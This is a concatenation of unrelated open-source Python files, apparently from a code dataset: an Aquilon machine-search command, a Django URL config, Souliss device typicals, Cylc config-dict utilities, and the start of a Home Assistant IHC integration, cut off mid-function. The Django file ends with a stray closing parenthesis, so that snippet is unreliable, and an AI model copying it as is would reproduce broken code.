# Copyright (C) 2009,2010,2011,2012,2013,2014,2015 Contributor
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Contains the logic for `aq search machine`."""
from sqlalchemy.orm import subqueryload, joinedload, undefer
from aquilon.exceptions_ import NotFoundException
from aquilon.aqdb.types import CpuType
from aquilon.aqdb.model import (Machine, Model, Cluster, ClusterResource,
HostResource, Resource, Share, Filesystem, Disk,
VirtualDisk, MetaCluster, DnsRecord, Chassis,
ChassisSlot)
from aquilon.utils import force_wwn
from aquilon.worker.broker import BrokerCommand
from aquilon.worker.dbwrappers.hardware_entity import (
search_hardware_entity_query)
from aquilon.worker.dbwrappers.host import hostname_to_host
from aquilon.worker.formats.list import StringAttributeList
class CommandSearchMachine(BrokerCommand):
    """Implement `aq search machine`.

    Builds a hardware entity query over Machine and narrows it with the
    optional CPU, memory, containment (cluster / metacluster / VM host),
    disk and chassis filters supplied on the command line.
    """

    required_parameters = []

    # Maps disk-related command-line options to (Disk column, transform).
    # The transform, when present, normalises the user-supplied value.
    disk_option_map = {
        'disk_name': ('device_name', None),
        'disk_size': ('capacity', None),
        'disk_controller': ('controller_type', None),
        'disk_wwn': ('wwn', force_wwn),
        'disk_address': ('address', None),
        'disk_bus_address': ('bus_address', None),
    }

    def render(self, session, hostname, machine, cpuname, cpuvendor, cpucount,
               memory, cluster, metacluster, vmhost, share, disk_share,
               disk_filesystem, uuid, chassis, slot, fullinfo, style,
               **arguments):
        """Return machines matching the given filters.

        Returns full Machine objects when --fullinfo is given or a non-raw
        output style is requested, otherwise a list of machine labels.
        """
        if share:
            self.deprecated_option("share", "Please use --disk_share instead.",
                                   **arguments)
            disk_share = share
        # Only load full ORM objects when the formatter needs them; plain
        # label queries are much cheaper.
        if fullinfo or style != 'raw':
            q = search_hardware_entity_query(session, Machine, **arguments)
        else:
            q = search_hardware_entity_query(session, Machine.label,
                                             **arguments)
        if machine:
            q = q.filter_by(label=machine)
        if hostname:
            dns_rec = DnsRecord.get_unique(session, fqdn=hostname, compel=True)
            q = q.filter(Machine.primary_name_id == dns_rec.id)
        if cpuname or cpuvendor:
            subq = Model.get_matching_query(session, name=cpuname,
                                            vendor=cpuvendor,
                                            model_type=CpuType.Cpu,
                                            compel=True)
            q = q.filter(Machine.cpu_model_id.in_(subq))
        if cpucount is not None:
            q = q.filter_by(cpu_quantity=cpucount)
        if memory is not None:
            q = q.filter_by(memory=memory)
        if uuid is not None:
            q = q.filter_by(uuid=uuid)
        if cluster:
            dbcluster = Cluster.get_unique(session, cluster, compel=True)
            # TODO: disallow metaclusters here
            if isinstance(dbcluster, MetaCluster):
                q = q.join(Machine.vm_container, ClusterResource, Cluster,
                           aliased=True)
                q = q.filter_by(metacluster=dbcluster)
            else:
                q = q.join(Machine.vm_container, ClusterResource, aliased=True)
                q = q.filter_by(cluster=dbcluster)
            q = q.reset_joinpoint()
        elif metacluster:
            dbmeta = MetaCluster.get_unique(session, metacluster, compel=True)
            q = q.join(Machine.vm_container, ClusterResource, Cluster,
                       aliased=True)
            q = q.filter_by(metacluster=dbmeta)
            q = q.reset_joinpoint()
        elif vmhost:
            dbhost = hostname_to_host(session, vmhost)
            q = q.join(Machine.vm_container, HostResource, aliased=True)
            q = q.filter_by(host=dbhost)
            q = q.reset_joinpoint()
        # Translate disk options to column matches
        disk_options = {}
        for arg_name, (col_name, transform) in self.disk_option_map.items():
            val = arguments.get(arg_name, None)
            if val is not None:
                if transform:
                    val = transform(arg_name, val)
                disk_options[col_name] = val
        if disk_share or disk_filesystem or disk_options:
            if disk_share:
                v2shares = session.query(Share.id).filter_by(name=disk_share)
                if not v2shares.count():
                    # Bug fix: report the name actually searched for.  The
                    # old code formatted "share", which is None when the
                    # user passed --disk_share.
                    raise NotFoundException("No shares found with name {0}."
                                            .format(disk_share))
                q = q.join(Machine.disks.of_type(VirtualDisk), aliased=True)
            elif disk_filesystem:
                # If --cluster was also given, then we could verify if the
                # named filesystem is attached to the cluster - potentially
                # inside a resourcegroup. It's not clear if that would worth
                # the effort.
                q = q.join(Machine.disks.of_type(VirtualDisk), aliased=True)
            else:
                q = q.join(Disk, aliased=True)
            if disk_options:
                q = q.filter_by(**disk_options)
            if disk_share:
                q = q.join(Resource, Share, aliased=True, from_joinpoint=True)
                q = q.filter_by(name=disk_share)
            elif disk_filesystem:
                q = q.join(Resource, Filesystem, aliased=True,
                           from_joinpoint=True)
                q = q.filter_by(name=disk_filesystem)
            q = q.reset_joinpoint()
        if chassis or slot is not None:
            q = q.join(ChassisSlot, aliased=True)
            if chassis:
                dbchassis = Chassis.get_unique(session, chassis, compel=True)
                q = q.filter_by(chassis=dbchassis)
            if slot is not None:
                q = q.filter_by(slot_number=slot)
            q = q.reset_joinpoint()
        if fullinfo or style != "raw":
            # Eager-load everything the formatter touches to avoid N+1
            # queries when rendering full machine records.
            q = q.options(undefer('comments'),
                          joinedload('location'),
                          subqueryload('interfaces'),
                          joinedload('interfaces.assignments'),
                          joinedload('interfaces.assignments.dns_records'),
                          joinedload('chassis_slot'),
                          subqueryload('chassis_slot.chassis'),
                          subqueryload('disks'),
                          undefer('disks.comments'),
                          joinedload('host'),
                          undefer('host.comments'),
                          undefer('host.personality_stage.personality.archetype.comments'),
                          subqueryload('host.services_used'),
                          subqueryload('host._cluster'),
                          joinedload('host._cluster.cluster'))
            return q.all()
        return StringAttributeList(q.all(), "label")
| guillaume-philippon/aquilon | lib/aquilon/worker/commands/search_machine.py | Python | apache-2.0 | 7,348 |
from django.conf.urls.defaults import *
from django.contrib import admin
# Register all ModelAdmin classes found in the installed apps.
admin.autodiscover()
# Core URL routing: admin site plus the sentry error-tracking UI.
urlpatterns = patterns('',
    (r'^admin/', include(admin.site.urls)),
    (r'^sentry/', include('sentry.urls')),
)
# Site root renders a static template via the generic "simple" view.
# NOTE(review): django.conf.urls.defaults and patterns() were removed in
# modern Django (1.6/1.10) -- this module targets an old release; confirm
# the project's Django version before upgrading.
urlpatterns += patterns('django.views.generic.simple',
    (r'^$', 'direct_to_template', {'template': 'site_index.html'})
)
) | tmitchell/django-watchdog | urls.py | Python | bsd-3-clause | 336 |
import logging
import struct
_LOGGER = logging.getLogger(__name__)
# Souliss typical (device type) registry, keyed by typical type id.
# Each entry carries: "desc" (human-readable description), "size" (state
# payload length in bytes), optional "name" (suggested entity name),
# optional "state_desc" (raw state byte -> readable state) and optional
# "units" for analog sensors.
typical_types = {
    0x11: {
        "desc": "T11: ON/OFF Digital Output with Timer Option",
        "size": 1,
        "name": "Switch Timer",
        "state_desc": {0x00: "off", 0x01: "on"},
    },
    0x12: {
        "desc": "T12: ON/OFF Digital Output with AUTO mode",
        "size": 1,
        "name": "Switch auto",
        "state_desc": {0x00: "off",
                       0x01: "on",
                       0xF0: "on/auto",
                       0xF1: "off/auto"},
    },
    0x13: {
        "desc": "T13: Digital Input Value",
        "size": 1,
        "state_desc": {0x00: "off", 0x01: "on"},
    },
    0x14: {
        "desc": "T14: Pulse Digital Output",
        "size": 1,
        "name": "Switch",
        "state_desc": {0x00: "off", 0x01: "on"},
    },
    0x15: {
        "desc": "T15: RGB Light",
        "size": 2,
        "state_desc": {0x00: "off", 0x01: "on"},
    },
    0x16: {
        "desc": "T16: RGB LED Strip",
        "size": 4,
        # Bug fix: state 0x00 was labelled "on"; every other typical maps
        # the 0x00 state to "off".
        "state_desc": {0x00: "off", 0x01: "on"},
    },
    0x18: {
        "desc": "T18: ON/OFF Digital Output (Step Relay)",
        "size": 1,
        "state_desc": {0x00: "off", 0x01: "on"},
    },
    0x19: {
        "desc": "T19: Single Color LED Strip",
        "size": 2,
        "state_desc": {0x00: "off", 0x01: "on"},
    },
    0x1A: {
        "desc": "T1A: Digital Input Pass Through",
        "size": 1,
        "state_desc": {0x00: "off", 0x01: "on"},
    },
    0x1B: {"desc": "T1B: Position Constrained ON/OFF Digital Output", "size": 1},
    0x21: {"desc": "T21: Motorized devices with limit switches", "size": 1},
    0x22: {"desc": "T22: Motorized devices with limit switches and middle position", "size": 1},
    0x31: {"desc": "T31: Temperature control with cooling and heating mode", "size": 5},
    0x32: {"desc": "T32: Air Conditioner", "size": 2},
    0x41: {"desc": "T41: Anti-theft integration -Main-", "size": 1},
    0x42: {"desc": "T42: Anti-theft integration -Peer-", "size": 1},
    0x51: {"desc": "T51: Analog input, half-precision floating point",
           "size": 2,
           "units": "units"},
    0x52: {"desc": "T52: Temperature measure (-20, +50) C",
           "size": 2,
           "units": "C"},
    0x53: {"desc": "T53: Humidity measure (0, 100) ",
           "size": 2,
           "units": "%"},
    0x54: {"desc": "T54: Light Sensor (0, 40) kLux",
           "size": 2,
           "units": "kLux"},
    0x55: {"desc": "T55: Voltage (0, 400) V",
           "size": 2,
           "units": "V"},
    0x56: {"desc": "T56: Current (0, 25) A",
           "size": 2,
           "units": "A"},
    0x57: {"desc": "T57: Power (0, 6500) W",
           "size": 2,
           "units": "W"},
    0x58: {"desc": "T58: Pressure measure (0, 1500) hPa",
           "size": 2,
           "units": "hPa"},
    0x61: {"desc": "T61: Analog setpoint, half-precision floating point", "size": 2},
    0x62: {"desc": "T62: Temperature measure (-20, +50) C", "size": 2},
    0x63: {"desc": "T63: Humidity measure (0, 100) ", "size": 2},
    0x64: {"desc": "T64: Light Sensor (0, 40) kLux", "size": 2},
    0x65: {"desc": "T65: Voltage (0, 400) V", "size": 2},
    0x66: {"desc": "T66: Current (0, 25) A", "size": 2},
    0x67: {"desc": "T67: Power (0, 6500) W", "size": 2},
    0x68: {"desc": "T68: Pressure measure (0, 1500) hPa", "size": 2}
}
class Typical(object):
    """Base class for a Souliss typical (one logical device in a node slot)."""

    def __init__(self, ttype):
        self.ttype = ttype
        self.description = typical_types[ttype]['desc']
        self.size = typical_types[ttype]['size']
        self.slot = -1   # undefined until assigned to a slot
        self.node = -1   # undefined until assigned to a slot
        # Initial raw state; overwritten by the first update().
        self.state = b'\x00\x00\x00\x00\x00\x00\x00'
        self.listeners = []

    def add_listener(self, callback):
        """Register a callback invoked with this typical on every state change."""
        self.listeners.append(callback)

    @staticmethod
    def factory_type(ttype):
        """Return the concrete Typical instance appropriate for *ttype*."""
        if ttype in [0x11, 0x12, 0x13, 0x14, 0x15, 0x16, 0x18, 0x19, 0x1A, 0x1B]:
            return TypicalT1n(ttype)
        elif ttype in [0x51, 0x52, 0x53, 0x54, 0x55, 0x56, 0x57, 0x58]:
            return TypicalT5n(ttype)
        else:
            return TypicalNotImplemented(ttype)

    def update(self, value):
        """Store the new raw state and notify listeners if it changed.

        *value* is truncated to this typical's payload size before comparing.
        """
        value = value[:self.size]
        if value != self.state:
            # Capture the old state before overwriting it: the original code
            # assigned self.state first (so old and new printed identically)
            # and passed four arguments to a five-placeholder format string,
            # which raised TypeError at log time.
            old_hex = ':'.join("{:02x}".format(c) for c in self.state[:self.size])
            new_hex = ':'.join("{:02x}".format(c) for c in value[:self.size])
            self.state = value
            self.state_description = value
            _LOGGER.info("Node %d: Typical %d - %s updated from %s to %s"
                         % (self.node, self.index, self.description,
                            old_hex, new_hex))
            for listener in self.listeners:
                listener(self)

    def set_node_slot_index(self, node, slot, index):
        """Record where this typical lives: node id, slot number, flat index."""
        self.node = node
        self.slot = slot
        self.index = index

    def to_dict(self):
        """Return a short serializable summary of this typical."""
        return {'ddesc': self.description,
                'slo': self.slot,
                'typ': self.ttype}
class TypicalT1n(Typical):
    """T1n family: digital inputs/outputs with a textual state description."""

    def __init__(self, ttype):
        super(TypicalT1n, self).__init__(ttype)
        # Raw state byte -> human-readable description for this type.
        self.state_desc = typical_types[ttype]['state_desc']

    def update(self, value):
        """Store the new raw state, derive its description, notify listeners."""
        value = value[:self.size]
        if value != self.state:
            self.state = value
            if self.size > 1:  # Raw description for Typicals T15, T16 and T19
                self.state_description = ':'.join("{:02x}".format(c) for c in self.state)
            else:
                if ord(value) in self.state_desc:
                    self.state_description = self.state_desc[ord(value)]
                else:
                    _LOGGER.warning("Unknow value!")
                    self.state_description = "Unknow value!"
            _LOGGER.info("Node %d: Typical %d - %s updated to %s"
                         % (self.node, self.index, self.description,
                            self.state_description))
            for listener in self.listeners:
                listener(self)

    def send_command(self, command):
        """Apply a Souliss T1n command to the local state."""
        # TODO: Handle different T1 behaviour
        if command == 0x01:  # Toggle
            if self.state == chr(1):
                self.update(chr(0))
            else:
                self.update(chr(1))
        elif command == 0x02:  # OnCmd
            # Bug fix: OnCmd must switch the output on (state 0x01, see
            # state_desc); the original handler set it to off here and to
            # on for OffCmd, i.e. the two commands were inverted.
            self.update(chr(1))
        elif command == 0x04:  # OffCmd
            self.update(chr(0))
        else:
            _LOGGER.debug('Command %x not implemented' % command)
class TypicalT5n(Typical):
    """T5n family: analog sensors whose state is a half-precision float."""
    def __init__(self, ttype):
        super(TypicalT5n,self).__init__(ttype)
        # Unit of measure string (e.g. "C", "%", "W") for this sensor type.
        self.units= typical_types[ttype]['units']
    def update(self, value):
        """Decode the 2-byte payload and notify listeners if it changed."""
        value = value[:self.size]
        if value != self.state:
            # 'e' = IEEE 754 binary16 (half-precision float); requires
            # Python 3.6+ struct support.
            self.state_description = struct.unpack('e', value)[0]
            self.state = value
            _LOGGER.info("Node %d: Typical %d - %s updated to %s %s" % (self.node, self.index,
                                                                        self.description,
                                                                        self.state_description,
                                                                        self.units))
            for listener in self.listeners:
                listener(self)
class TypicalNotImplemented(Typical):
    """Fallback for typical types that have no dedicated implementation.

    Behaves like the raw base class; only logs a warning on creation.
    """
    def __init__(self, ttype):
        _LOGGER.warning('Typical %x not implemented' % ttype)
        super(TypicalNotImplemented,self).__init__(ttype)
| maoterodapena/pysouliss | souliss/Typicals.py | Python | mit | 9,295 |
#!/usr/bin/env python
# THIS FILE IS PART OF THE CYLC SUITE ENGINE.
# Copyright (C) 2008-2016 NIWA
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
"""Utility functions for printing and manipulating PARSEC NESTED DICTS.
The copy and override functions below assume values are either dicts
(nesting) or shallow collections of simple types.
"""
import sys
from copy import copy
from parsec.OrderedDict import OrderedDictWithDefaults
def listjoin(lst, none_str=''):
    """Render *lst* as a comma-separated string.

    ``None`` elements are rendered as *none_str*; an empty/None list yields
    *none_str* itself.  Elements containing comment or list-delimiter
    characters are emitted via repr() so they come out quoted.
    Note: multi-line values inside the list are not handled.
    """
    if not lst:
        # Nothing to join - stand in with the "no value" marker.
        return none_str
    special = ',#"\''

    def render(item):
        if item is None:
            return none_str
        text = str(item)
        if any(ch in text for ch in special):
            return repr(item)  # will be quoted
        return text

    return ', '.join(render(item) for item in lst)
def printcfg(cfg, level=0, indent=0, prefix='', none_str='',
             handle=sys.stdout):
    """Pretty-print a parsec config item or section (nested dict).

    As returned by parse.config.get().  Writes ini-style output to *handle*:
    section headings in [brackets] nested per *level*, settings as
    "key = value" indented per *indent*, every line prefixed with *prefix*.
    ``None`` values render as *none_str* (suppressed entirely when it is None).
    """
    # Iterative depth-first traversal; each stack entry is
    # (key, value, bracket nesting level, indent level).
    stack = [("", cfg, level, indent)]
    while stack:
        key_i, cfg_i, level_i, indent_i = stack.pop()
        # Negative string multiplication yields '' for the top level.
        spacer = " " * 4 * (indent_i - 1)
        if isinstance(cfg_i, dict):
            if not cfg_i and none_str is None:
                # Don't print empty sections if none_str is None. This does not
                # handle sections with no items printed because the values of
                # all items are empty or None.
                continue
            if key_i and level_i:
                # Print heading
                handle.write("%s%s%s%s%s\n" % (
                    prefix, spacer, '[' * level_i, str(key_i), ']' * level_i))
            # Nested sections are printed after normal settings
            subsections = []
            values = []
            for key, item in cfg_i.items():
                if isinstance(item, dict):
                    subsections.append((key, item, level_i + 1, indent_i + 1))
                else:
                    values.append((key, item, level_i + 1, indent_i + 1))
            # reversed() + LIFO pop() preserves original ordering, with all
            # plain values emitted before any subsection.
            stack += reversed(subsections)
            stack += reversed(values)
        else:
            key = ""
            if key_i:
                key = "%s = " % key_i
            if cfg_i is None:
                value = none_str
            elif isinstance(cfg_i, list):
                value = listjoin(cfg_i, none_str)
            elif "\n" in str(cfg_i) and key:
                # Multi-line values are emitted as triple-quoted blocks.
                value = '"""\n%s\n"""' % (cfg_i)
            else:
                value = str(cfg_i)
            if value is not None:
                handle.write("%s%s%s%s\n" % (prefix, spacer, key, value))
def replicate(target, source):
    """Replicate source *into* target.

    Source elements need not exist in target already, so source overrides
    common elements in target and otherwise adds elements to it.  Dict
    values are deep-copied; lists are shallow-copied; scalars assigned.
    """
    if not source:
        # NOTE(review): rebinding the local name does not affect the
        # caller's dict -- an empty source leaves target untouched.  The
        # assignment is a no-op; confirm whether clearing was intended.
        target = OrderedDictWithDefaults()
        return
    if hasattr(source, "defaults_"):
        # Carry over the sparse "__MANY__" defaults alongside the data.
        target.defaults_ = pdeepcopy(source.defaults_)
    for key, val in source.items():
        if isinstance(val, dict):
            if key not in target:
                target[key] = OrderedDictWithDefaults()
            if hasattr(val, 'defaults_'):
                target[key].defaults_ = pdeepcopy(val.defaults_)
            replicate(target[key], val)
        elif isinstance(val, list):
            # Shallow copy so later mutation of source lists is isolated.
            target[key] = val[:]
        else:
            target[key] = val
def pdeepcopy(source):
    """Make a deep copy of a pdict source.

    Returns a fresh OrderedDictWithDefaults populated via replicate(), so
    nested dicts (and their defaults_) are copied rather than shared.
    """
    target = OrderedDictWithDefaults()
    replicate(target, source)
    return target
def poverride(target, sparse):
    """Override items in a target pdict.

    Target sub-dicts must already exist (unlike m_override, there is no
    "__MANY__" placeholder handling here -- a missing key raises KeyError).
    """
    if not sparse:
        # NOTE(review): rebinding the local name is a no-op for the caller;
        # an empty sparse dict leaves target unchanged.  Confirm intent.
        target = OrderedDictWithDefaults()
        return
    for key, val in sparse.items():
        if isinstance(val, dict):
            poverride(target[key], val)
        elif isinstance(val, list):
            # Shallow copy so the override and source don't share the list.
            target[key] = val[:]
        else:
            target[key] = val
def m_override(target, sparse):
    """Override items in a target pdict.

    Target keys must already exist unless there is a "__MANY__" placeholder in
    the right position.  "__MANY__" entries act as templates: any key present
    in *sparse* but absent from *target* is created where a placeholder (or an
    inherited placeholder default) allows it.
    """
    if not sparse:
        # NOTE(review): rebinding the local name is a no-op for the caller;
        # an empty sparse dict leaves target unchanged.  Confirm intent.
        target = OrderedDictWithDefaults()
        return
    # Iterative breadth-first merge.  Each queue entry is:
    # (source dict, destination dict, key path for error messages,
    #  "__MANY__" defaults applicable at this depth).
    stack = [(sparse, target, [], OrderedDictWithDefaults())]
    defaults_list = []
    while stack:
        source, dest, keylist, many_defaults = stack.pop(0)
        if many_defaults:
            # Remember to attach the defaults once the whole merge is done.
            defaults_list.append((dest, many_defaults))
        for key, val in source.items():
            if isinstance(val, dict):
                if key in many_defaults:
                    child_many_defaults = many_defaults[key]
                else:
                    child_many_defaults = OrderedDictWithDefaults()
                if key not in dest:
                    # The key is new: it is only legal if a "__MANY__"
                    # placeholder (direct or inherited) covers this position.
                    if '__MANY__' in dest:
                        dest[key] = OrderedDictWithDefaults()
                        child_many_defaults = dest['__MANY__']
                    elif '__MANY__' in many_defaults:
                        # A 'sub-many' dict - would it ever exist in real life?
                        dest[key] = OrderedDictWithDefaults()
                        child_many_defaults = many_defaults['__MANY__']
                    elif key in many_defaults:
                        dest[key] = OrderedDictWithDefaults()
                    else:
                        # TODO - validation prevents this, but handle properly
                        # for completeness.
                        raise Exception(
                            "parsec dict override: no __MANY__ placeholder" +
                            "%s" % (keylist + [key])
                        )
                stack.append(
                    (val, dest[key], keylist + [key], child_many_defaults))
            else:
                if key not in dest:
                    if ('__MANY__' in dest or key in many_defaults or
                            '__MANY__' in many_defaults):
                        # Lists are shallow-copied; scalars assigned.
                        if isinstance(val, list):
                            dest[key] = val[:]
                        else:
                            dest[key] = val
                    else:
                        # TODO - validation prevents this, but handle properly
                        # for completeness.
                        raise Exception(
                            "parsec dict override: no __MANY__ placeholder" +
                            "%s" % (keylist + [key])
                        )
                if isinstance(val, list):
                    dest[key] = val[:]
                else:
                    dest[key] = val
    # Attach the accumulated "__MANY__" defaults after the structure is built.
    for dest_dict, defaults in defaults_list:
        dest_dict.defaults_ = defaults
def un_many(cfig):
    """Remove any '__MANY__' items from a nested dict, in-place.

    Placeholders stored in a pdict's ``defaults_`` mapping (where deletion
    from the dict itself raises KeyError) are removed from there instead.
    """
    if not cfig:
        return
    # Iterate over a snapshot of the items: deleting from a dict while
    # iterating its live view raises RuntimeError on Python 3 (and is
    # undefined behaviour in general).
    for key, val in list(cfig.items()):
        if key == '__MANY__':
            try:
                del cfig[key]
            except KeyError:
                # The key may live only in the pdict's defaults.
                if hasattr(cfig, 'defaults_') and key in cfig.defaults_:
                    del cfig.defaults_[key]
                else:
                    raise
        elif isinstance(val, dict):
            un_many(cfig[key])
def itemstr(parents=None, item=None, value=None):
    """Pretty-print an item from list of sections, item name, and value.

    E.g.: ([sec1, sec2], item, value) to '[sec1][sec2]item = value'.
    When *value* is given without *item*, the last parent is treated as
    the item name.
    """
    text = ''
    if parents:
        keys = list(parents)
        if value and not item:
            # Last parent doubles as the item name.
            item = keys[-1]
            keys.remove(item)
        text = '[' + ']['.join(keys) + ']'
    if item:
        text += str(item)
    if value:
        text += " = " + str(value)
    # With nothing else to show, fall back to the stringified value.
    return text if text else str(value)
if __name__ == "__main__":
    # Ad-hoc demo of itemstr() and printcfg() output shapes.
    # NOTE: this file is Python 2 (print statements); it will not run
    # under Python 3 without conversion.
    print 'Item strings:'
    print ' ', itemstr(['sec1', 'sec2'], 'item', 'value')
    print ' ', itemstr(['sec1', 'sec2'], 'item')
    print ' ', itemstr(['sec1', 'sec2'])
    print ' ', itemstr(['sec1'])
    print ' ', itemstr(item='item', value='value')
    print ' ', itemstr(item='item')
    print ' ', itemstr(value='value')
    # error or useful?
    print ' ', itemstr(parents=['sec1', 'sec2'], value='value')
    print 'Configs:'
    printcfg('foo', prefix=' > ')
    printcfg(['foo', 'bar'], prefix=' > ')
    printcfg({}, prefix=' > ')
    printcfg({'foo': 1}, prefix=' > ')
    printcfg({'foo': None}, prefix=' > ')
    printcfg({'foo': None}, none_str='(none)', prefix=' > ')
    printcfg({'foo': {'bar': 1}}, prefix=' > ')
    printcfg({'foo': {'bar': None}}, prefix=' > ')
    printcfg({'foo': {'bar': None}}, none_str='(none)', prefix=' > ')
    printcfg({'foo': {'bar': 1, 'baz': 2, 'qux': {'boo': None}}},
             none_str='(none)', prefix=' > ')
| benfitzpatrick/cylc | lib/parsec/util.py | Python | gpl-3.0 | 9,720 |
"""Support for IHC devices."""
import logging
import os.path
from defusedxml import ElementTree
from ihcsdk.ihccontroller import IHCController
import voluptuous as vol
from homeassistant.components.binary_sensor import DEVICE_CLASSES_SCHEMA
from homeassistant.config import load_yaml_config_file
from homeassistant.const import (
CONF_ID,
CONF_NAME,
CONF_PASSWORD,
CONF_TYPE,
CONF_UNIT_OF_MEASUREMENT,
CONF_URL,
CONF_USERNAME,
TEMP_CELSIUS,
)
from homeassistant.core import HomeAssistant
from homeassistant.helpers import discovery
import homeassistant.helpers.config_validation as cv
from .const import (
ATTR_CONTROLLER_ID,
ATTR_IHC_ID,
ATTR_VALUE,
CONF_AUTOSETUP,
CONF_BINARY_SENSOR,
CONF_DIMMABLE,
CONF_INFO,
CONF_INVERTING,
CONF_LIGHT,
CONF_NODE,
CONF_NOTE,
CONF_OFF_ID,
CONF_ON_ID,
CONF_POSITION,
CONF_SENSOR,
CONF_SWITCH,
CONF_XPATH,
SERVICE_PULSE,
SERVICE_SET_RUNTIME_VALUE_BOOL,
SERVICE_SET_RUNTIME_VALUE_FLOAT,
SERVICE_SET_RUNTIME_VALUE_INT,
)
from .util import async_pulse
_LOGGER = logging.getLogger(__name__)
AUTO_SETUP_YAML = "ihc_auto_setup.yaml"
DOMAIN = "ihc"
IHC_CONTROLLER = "controller"
IHC_INFO = "info"
PLATFORMS = ("binary_sensor", "light", "sensor", "switch")
def validate_name(config):
    """Ensure the device config carries a name, deriving ``ihc_<id>`` if absent."""
    if CONF_NAME not in config:
        config[CONF_NAME] = f"ihc_{config[CONF_ID]}"
    return config
DEVICE_SCHEMA = vol.Schema(
{
vol.Required(CONF_ID): cv.positive_int,
vol.Optional(CONF_NAME): cv.string,
vol.Optional(CONF_NOTE): cv.string,
vol.Optional(CONF_POSITION): cv.string,
}
)
SWITCH_SCHEMA = DEVICE_SCHEMA.extend(
{
vol.Optional(CONF_OFF_ID, default=0): cv.positive_int,
vol.Optional(CONF_ON_ID, default=0): cv.positive_int,
}
)
BINARY_SENSOR_SCHEMA = DEVICE_SCHEMA.extend(
{
vol.Optional(CONF_INVERTING, default=False): cv.boolean,
vol.Optional(CONF_TYPE): DEVICE_CLASSES_SCHEMA,
}
)
LIGHT_SCHEMA = DEVICE_SCHEMA.extend(
{
vol.Optional(CONF_DIMMABLE, default=False): cv.boolean,
vol.Optional(CONF_OFF_ID, default=0): cv.positive_int,
vol.Optional(CONF_ON_ID, default=0): cv.positive_int,
}
)
SENSOR_SCHEMA = DEVICE_SCHEMA.extend(
{vol.Optional(CONF_UNIT_OF_MEASUREMENT, default=TEMP_CELSIUS): cv.string}
)
IHC_SCHEMA = vol.Schema(
{
vol.Required(CONF_PASSWORD): cv.string,
vol.Required(CONF_URL): cv.string,
vol.Required(CONF_USERNAME): cv.string,
vol.Optional(CONF_AUTOSETUP, default=True): cv.boolean,
vol.Optional(CONF_BINARY_SENSOR, default=[]): vol.All(
cv.ensure_list, [vol.All(BINARY_SENSOR_SCHEMA, validate_name)]
),
vol.Optional(CONF_INFO, default=True): cv.boolean,
vol.Optional(CONF_LIGHT, default=[]): vol.All(
cv.ensure_list, [vol.All(LIGHT_SCHEMA, validate_name)]
),
vol.Optional(CONF_SENSOR, default=[]): vol.All(
cv.ensure_list, [vol.All(SENSOR_SCHEMA, validate_name)]
),
vol.Optional(CONF_SWITCH, default=[]): vol.All(
cv.ensure_list, [vol.All(SWITCH_SCHEMA, validate_name)]
),
}
)
CONFIG_SCHEMA = vol.Schema(
{DOMAIN: vol.Schema(vol.All(cv.ensure_list, [IHC_SCHEMA]))}, extra=vol.ALLOW_EXTRA
)
AUTO_SETUP_SCHEMA = vol.Schema(
{
vol.Optional(CONF_BINARY_SENSOR, default=[]): vol.All(
cv.ensure_list,
[
vol.All(
{
vol.Required(CONF_NODE): cv.string,
vol.Required(CONF_XPATH): cv.string,
vol.Optional(CONF_INVERTING, default=False): cv.boolean,
vol.Optional(CONF_TYPE): cv.string,
}
)
],
),
vol.Optional(CONF_LIGHT, default=[]): vol.All(
cv.ensure_list,
[
vol.All(
{
vol.Required(CONF_NODE): cv.string,
vol.Required(CONF_XPATH): cv.string,
vol.Optional(CONF_DIMMABLE, default=False): cv.boolean,
}
)
],
),
vol.Optional(CONF_SENSOR, default=[]): vol.All(
cv.ensure_list,
[
vol.All(
{
vol.Required(CONF_NODE): cv.string,
vol.Required(CONF_XPATH): cv.string,
vol.Optional(
CONF_UNIT_OF_MEASUREMENT, default=TEMP_CELSIUS
): cv.string,
}
)
],
),
vol.Optional(CONF_SWITCH, default=[]): vol.All(
cv.ensure_list,
[
vol.All(
{
vol.Required(CONF_NODE): cv.string,
vol.Required(CONF_XPATH): cv.string,
}
)
],
),
}
)
SET_RUNTIME_VALUE_BOOL_SCHEMA = vol.Schema(
{
vol.Required(ATTR_IHC_ID): cv.positive_int,
vol.Required(ATTR_VALUE): cv.boolean,
vol.Optional(ATTR_CONTROLLER_ID, default=0): cv.positive_int,
}
)
SET_RUNTIME_VALUE_INT_SCHEMA = vol.Schema(
{
vol.Required(ATTR_IHC_ID): cv.positive_int,
vol.Required(ATTR_VALUE): vol.Coerce(int),
vol.Optional(ATTR_CONTROLLER_ID, default=0): cv.positive_int,
}
)
SET_RUNTIME_VALUE_FLOAT_SCHEMA = vol.Schema(
{
vol.Required(ATTR_IHC_ID): cv.positive_int,
vol.Required(ATTR_VALUE): vol.Coerce(float),
vol.Optional(ATTR_CONTROLLER_ID, default=0): cv.positive_int,
}
)
PULSE_SCHEMA = vol.Schema(
{
vol.Required(ATTR_IHC_ID): cv.positive_int,
vol.Optional(ATTR_CONTROLLER_ID, default=0): cv.positive_int,
}
)
def setup(hass, config):
    """Set up the IHC integration.

    One controller is set up per configured entry; stop (and report
    failure) at the first controller that cannot be initialised.
    """
    controller_confs = config.get(DOMAIN)
    # all() short-circuits, matching the original early-return on failure.
    return all(
        ihc_setup(hass, config, controller_conf, index)
        for index, controller_conf in enumerate(controller_confs)
    )
def ihc_setup(hass, config, conf, controller_id):
    """Set up one IHC controller.

    Authenticates against the controller, optionally auto-discovers
    products from the project file, wires up manually configured devices,
    and stores the controller handle in hass.data.  Returns False on any
    failure so the caller can abort overall setup.
    """
    url = conf[CONF_URL]
    username = conf[CONF_USERNAME]
    password = conf[CONF_PASSWORD]
    ihc_controller = IHCController(url, username, password)
    if not ihc_controller.authenticate():
        _LOGGER.error("Unable to authenticate on IHC controller")
        return False
    if conf[CONF_AUTOSETUP] and not autosetup_ihc_products(
        hass, config, ihc_controller, controller_id
    ):
